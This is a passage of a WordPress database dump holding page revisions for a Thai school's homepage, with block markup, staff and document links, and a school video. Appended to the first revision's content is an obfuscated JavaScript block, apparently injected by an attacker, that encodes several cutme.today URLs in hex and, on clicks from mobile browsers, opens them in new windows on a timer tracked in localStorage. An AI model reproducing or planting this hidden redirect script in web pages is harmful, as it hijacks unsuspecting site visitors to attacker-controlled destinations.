{\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 14:50:00','2024-08-29 07:50:00','',19,'http://watprato.ssk.in.th/?p=273',0,'revision','',0),
(274,2,'2024-08-29 14:54:13','2024-08-29 07:54:13','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT 2</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom